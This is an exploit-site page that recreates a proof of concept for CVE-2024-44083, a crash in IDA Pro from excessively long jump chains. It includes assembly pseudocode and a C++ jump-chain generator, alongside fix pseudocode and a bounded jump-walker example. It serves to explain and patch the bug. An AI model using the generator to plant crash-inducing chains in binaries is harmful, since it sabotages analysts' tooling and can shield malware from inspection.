## https://sploitus.com/exploit?id=D6D1F9BE-61C7-57A6-A6B7-774C88FC1FBA
# CVE-2024-44083

the original PoC repos got deleted (`github.com/Azvanzed/CVE-2024-44083`, `github.com/Azvanzed/IdaMeme`) so here it is. figured I'd recreate it for anyone who wants to understand how it works or test their setup.

IDA Pro ≤ 8.4 crashes when analyzing binaries with excessive jump chains.

## the bug

`ida64.dll` doesn't limit how deep it goes when following jump chains, so a binary with thousands of linked jumps ending at the entry point makes IDA kill itself during analysis.

| field | value |
|-------|-------|
| CVE | CVE-2024-44083 |
| affected | IDA Pro ≤ 8.4 |
| component | ida64.dll |
| CWE | CWE-770 (allocation of resources without limits or throttling) |
| impact | crash (DoS) |

## how it works

the idea is simple: make a section full of jumps that keep jumping to more jumps

```asm
; pseudocode obviously

section .text

; thousands of these
jump_0:
    jmp jump_1
jump_1:
    jmp jump_2
jump_2:
    jmp jump_3
; ... keep going ...
jump_9999:
    jmp payload

payload:
    call _start    ; this creates the cross-reference that breaks things

_start:
    ; IDA tries to resolve all the jumps pointing here
    ; boom crash
    ret
```

IDA tries to follow and track all these jumps while building cross-references, and with enough of them chained together it just gives up and crashes.

## doing it yourself (example)

if you wanted to make something like this in C++ you'd do something like:

```cpp
#include <windows.h>
#include <cstdio>

// the idea is to generate a ton of jump instructions
// that chain together and eventually hit the entry point
void generate_jump_chain() {
    const int num_jumps = 10000;

    // allocate executable memory for our jump chain
    unsigned char* code = (unsigned char*)VirtualAlloc(
        NULL,
        num_jumps * 5 + 10,  // 10,000 jumps × 5 bytes + some extra
        MEM_COMMIT | MEM_RESERVE,
        PAGE_EXECUTE_READWRITE
    );

    if (!code) return;

    int offset = 0;

    // create 10,000 chained jumps. each one is the 5-byte `jmp rel32`
    // (E9 xx xx xx xx) the size math above assumes; rel32 is relative to
    // the end of the instruction, so a displacement of 0 lands on the
    // very next jmp in the chain
    for (int i = 0; i < num_jumps; i++) {
        code[offset++] = 0xE9;
        code[offset++] = 0x00;
        code[offset++] = 0x00;
        code[offset++] = 0x00;
        code[offset++] = 0x00;
    }

    // whatever follows the chain (payload / entry point) goes right after
    // these bytes when you drop them into the .text section of the test binary
    printf("wrote %d bytes of jump chain\n", offset);

    // done with it here; a real PoC writes the buffer out first
    VirtualFree(code, 0, MEM_RELEASE);
}
```

## the fix

bound the recursive jump walk. pseudocode:

```cpp
// pseudocode: address_t, get_jump_target() and warn() stand in for
// whatever the analyzer actually uses
#define MAX_JUMP_DEPTH 1000   // any finite cap works

void analyze_jumps(address_t addr, int depth) {
    if (depth > MAX_JUMP_DEPTH) {
        warn("jump chain too deep. fail.");
        return;  // dont crash just stop
    }

    address_t target = get_jump_target(addr);
    if (target) {
        analyze_jumps(target, depth + 1);
    }
}
```

literally just add a depth limit, that's it.
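as an added example tying the "how it works" and "the fix" halves together (this is not code from the page or from the deleted Azvanzed repos): a small C++ model that encodes an N-jump `jmp rel32` chain into a flat byte buffer, the same E9-with-displacement-0 layout the generator above produces, and then follows it the way a bounded analyzer should, iteratively with a hop cap and a visited set instead of unbounded recursion. it assumes a flat buffer of offsets in place of real virtual addresses; `encode_jump_chain`, `follow_jumps` and `ChainResult` are names made up for this example, not anything inside IDA.

```cpp
#include <cstdint>
#include <cstddef>
#include <cstdio>
#include <unordered_set>
#include <vector>

// Builds n chained `jmp rel32` (E9 xx xx xx xx) instructions in a flat buffer.
// Jump i lives at offset 5*i and targets jump i+1; the last one targets
// payload_off. rel32 is measured from the end of the 5-byte instruction, so a
// displacement of 0 lands on whatever immediately follows.
std::vector<uint8_t> encode_jump_chain(size_t n, uint32_t payload_off) {
    std::vector<uint8_t> code;
    code.reserve(n * 5);
    for (size_t i = 0; i < n; i++) {
        uint32_t ip_after = static_cast<uint32_t>((i + 1) * 5);
        uint32_t target = (i + 1 < n) ? ip_after : payload_off;
        uint32_t rel = target - ip_after;  // wraps mod 2^32 for backward jumps
        code.push_back(0xE9);
        for (int b = 0; b < 4; b++)
            code.push_back(static_cast<uint8_t>(rel >> (8 * b)));
    }
    return code;
}

struct ChainResult {
    enum Kind { Landed, TooDeep, Cycle } kind;
    uint32_t addr;  // offset where the walk ended
    size_t hops;    // jmps followed before it ended
};

// Follows E9 jumps from `start` the way a bounded analyzer should: iteratively
// (no recursion to blow the stack), with a hop cap and a visited set so that a
// chain that is absurdly long or loops back on itself is reported, not chased.
ChainResult follow_jumps(const std::vector<uint8_t>& code, uint32_t start,
                         size_t max_hops) {
    std::unordered_set<uint32_t> visited;
    uint32_t ip = start;
    size_t hops = 0;
    while (ip < code.size() && code.size() - ip >= 5 && code[ip] == 0xE9) {
        if (hops >= max_hops) return {ChainResult::TooDeep, ip, hops};
        if (!visited.insert(ip).second) return {ChainResult::Cycle, ip, hops};
        uint32_t rel = 0;
        for (int b = 0; b < 4; b++)
            rel |= static_cast<uint32_t>(code[ip + 1 + b]) << (8 * b);
        ip += 5 + rel;  // mod 2^32, same as the CPU
        hops++;
    }
    return {ChainResult::Landed, ip, hops};
}

int main() {
    // constructed input: 10,000 jumps ending on a "payload" right after them
    std::vector<uint8_t> chain = encode_jump_chain(10000, 50000);
    ChainResult r = follow_jumps(chain, 0, 1u << 20);
    printf("landed at 0x%x after %zu hops (kind %d)\n", r.addr, r.hops, (int)r.kind);

    // same chain, but with a cap smaller than the chain length
    r = follow_jumps(chain, 0, 1000);
    printf("capped at 0x%x after %zu hops (kind %d)\n", r.addr, r.hops, (int)r.kind);

    // constructed input: 3 jumps whose tail points back at the head
    std::vector<uint8_t> loop = encode_jump_chain(3, 0);
    r = follow_jumps(loop, 0, 1u << 20);
    printf("cycle at 0x%x after %zu hops (kind %d)\n", r.addr, r.hops, (int)r.kind);
    return 0;
}
```

the visited set is the part the depth-cap pseudocode above doesn't have: a chain that loops back on itself (the three-jump case in `main`) gets reported as a cycle after three hops instead of being walked until the cap is hit, and the iterative loop means the cap is about analysis time, not stack space.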

## references

- [NVD](https://nvd.nist.gov/vuln/detail/CVE-2024-44083)
- [hexrays.su](https://hexrays.su/) <-- to upgrade your ida

## disclaimer

for educational purposes only. don't be a dick.